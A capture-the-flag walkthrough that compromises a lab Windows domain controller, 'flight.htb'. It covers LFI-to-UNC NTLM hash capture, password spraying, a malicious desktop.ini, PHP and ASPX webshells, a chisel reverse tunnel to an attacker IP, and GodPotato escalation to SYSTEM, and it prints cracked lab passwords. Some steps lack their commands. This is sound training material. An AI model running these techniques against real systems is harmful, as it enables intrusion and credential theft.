Hard Windows Active Directory machine with a long but logical chain. A PHP ?view= parameter accepts
UNC paths — pointing it at Responder captures an NTLMv2 hash for svc_apache. Password spray hits
S.Moon, who can write to a Shared share. A malicious desktop.ini captures
c.bum's hash, giving write access to the Apache webroot. A PHP webshell lands a shell as
svc_apache. RunasCs pivots to c.bum, who can write to IIS's development root on port 8000.
A chisel tunnel exposes the internal port, an ASPX webshell runs as the IIS AppPool with
SeImpersonatePrivilege, and GodPotato escalates to SYSTEM.
User Flag
C:\Users\C.Bum\Desktop\user.txt
Root Flag
C:\Users\Administrator\Desktop\root.txt
01Reconnaissance
Full port scan confirms a Domain Controller. The web server on port 80 is Apache 2.4.52 with PHP 8.1.1 serving a static "g0 Aviation" site. Domain is flight.htb.
nmap
$nmap-sC -sV -p---min-rate5000-oNnmap_full.txt10.129.228.12053/tcp open domain Windows DNS80/tcp open http Apache 2.4.52 (PHP 8.1.1) — "g0 Aviation"88/tcp open kerberos-sec Windows KDC389/tcp open ldap Active Directory (Domain: flight.htb)445/tcp open microsoft-ds SMB (signing required)| clock-skew: +6h58m
clock skew ~7h: Kerberos requires clocks within 5 minutes of the DC. If you hit KRB_AP_ERR_SKEW, sync first: sudo ntpdate -u 10.129.228.120. NTLM-based attacks are unaffected by skew.
env setup
$ echo "10.129.228.120 flight.htb" | sudo tee -a /etc/hosts
$ export IP=10.129.228.120$ export DOMAIN=flight.htb
SMB null auth works (login succeeds) but share enumeration and RID brute are denied. Guest is disabled. We need credentials first — the web app is the way in.
02VHost Discovery — school.flight.htb
The main site is a static brochure — no PHP endpoints, no login forms. Fuzz the Host header to discover other virtual hosts on the same IP.
common mistake: don't fuzz via http://FUZZ.flight.htb/ in the URL — that relies on DNS resolving the subdomain. Always use -H "Host: FUZZ.flight.htb" against the IP and filter by size to remove the baseline response.
add vhost
$ echo "10.129.228.120 school.flight.htb" | sudo tee -a /etc/hosts
school.flight.htb is a PHP site with a ?view= parameter — a classic LFI candidate.
03LFI → UNC Path → NTLM Hash (svc_apache)
The ?view= parameter loads local files — confirmed by reading the hosts file directly. PHP's include() also supports UNC paths. When PHP on a Windows server tries to open \\attacker\share, Windows initiates an SMB connection and leaks an NTLMv2 hash.
confirm LFI
$ curl "http://school.flight.htb/index.php?view=c:/windows/system32/drivers/etc/hosts"# Copyright (c) 1993-2009 Microsoft Corp...127.0.0.1 localhost
credential:svc_apache:S@Ss!K@*t13. NTLMv2 mode is -m 5600 — not to be confused with NTLMv1 (-m 5500) or Net-NTLMv2 relay attacks.
04Password Spray → S.Moon → desktop.ini → c.bum
With svc_apache credentials we can enumerate domain users, then spray the cracked password across all accounts — service accounts often share passwords with regular users.
S.Moon can write to the Shared share. When a user browses a network share in Windows Explorer, their system auto-authenticates to load icons and thumbnails. Drop a desktop.ini pointing at our Responder to capture their hash.
From the svc_apache shell, internal recon reveals two important things: port 8000 is listening internally (IIS, not exposed externally), and c.bum has write access to C:\inetpub\development\ — the IIS app root on that port. We need to be c.bum to write there.
RunasCs runs commands as another user without needing an interactive logon session — useful when you have credentials but no GUI or interactive shell. Upload it via the Web share and pivot to c.bum.
C:\Users\C.Bum\Desktop> type user.txt************************
07Chisel Tunnel + IIS ASPX Webshell
Port 8000 is firewalled externally. Use chisel to create a reverse TCP tunnel so we can reach it from Kali. Then deploy an ASPX webshell — PHP doesn't run on IIS, we need ASP.NET.
chisel — reverse tunnel
$chisel server -p9001--reverseC:\> chisel.exe client 10.10.14.78:9001 R:8000:127.0.0.1:8000
http://127.0.0.1:8000 on Kali now maps to port 8000 on the target. From the c.bum shell, copy the ASPX webshell, nc.exe, and GodPotato into C:\inetpub\development\:
$ curl "http://127.0.0.1:8000/shell.aspx?cmd=whoami"iis apppool\defaultapppool$ curl "http://127.0.0.1:8000/shell.aspx?cmd=whoami+/priv"SeImpersonatePrivilege Impersonate a client after authentication Enabled
finding: IIS AppPool accounts almost always hold SeImpersonatePrivilege — they need it to impersonate authenticated web users. Combined with any potato exploit, SYSTEM is one command away.
08GodPotato → SYSTEM
GodPotato abuses SeImpersonatePrivilege by tricking a SYSTEM-level COM server into authenticating to a fake endpoint we control, then stealing its token to run arbitrary commands as SYSTEM. Works on modern Windows without needing a writable named pipe.
nc -lvnp 4447C:\> whoamint authority\systemC:\> type C:\Users\Administrator\Desktop\root.txt************************
09Full Attack Chain
attack chain summary
Nmap → DC on 10.129.228.120, Apache on port 80, clock skew ~7h
│
▼
ffuf vhost fuzz → school.flight.htb discovered
PHP ?view= parameter → LFI confirmed
│
▼
LFI + UNC path → Responder captures SMB auth
hashcat -m 5600 → svc_apache:S@Ss!K@*t13
│
▼
Password spray → S.Moon:S@Ss!K@*t13
Shared share WRITE → desktop.ini (malicious icon UNC)
→ Responder → hashcat → c.bum:Tikkycoll_431012284
│
▼
c.bum → Web share WRITE (C:\xampp\htdocs)
PHP webshell → shell as flight\svc_apache
│
▼
RunasCs (c.bum creds) → shell as flight\c.bum
→ user.txt ✓
→ write access to C:\inetpub\development\ (IIS port 8000)
│
▼
chisel reverse tunnel → port 8000 exposed on Kali
ASPX webshell deployed → iis apppool\defaultapppool
SeImpersonatePrivilege enabled
│
▼
GodPotato → token impersonation → nt authority\system
→ root.txt ✓
key takeaways:
· Any PHP include() accepting user input can be pointed at a UNC path to leak NTLMv2 hashes on Windows
· Always spray every cracked password across all known users — service accounts often share passwords
· A malicious desktop.ini with a UNC icon path captures hashes from anyone who browses the share
· SMB write to a webroot = PHP code execution; check net share to map share names to local paths
· RunasCs enables lateral movement with known creds without needing an interactive session
· Always run netstat -ano from a foothold — firewalled internal ports often host the privilege escalation path
· IIS AppPool + SeImpersonatePrivilege + GodPotato = SYSTEM on any modern Windows version
· Chisel is the go-to for tunneling through firewalled internal services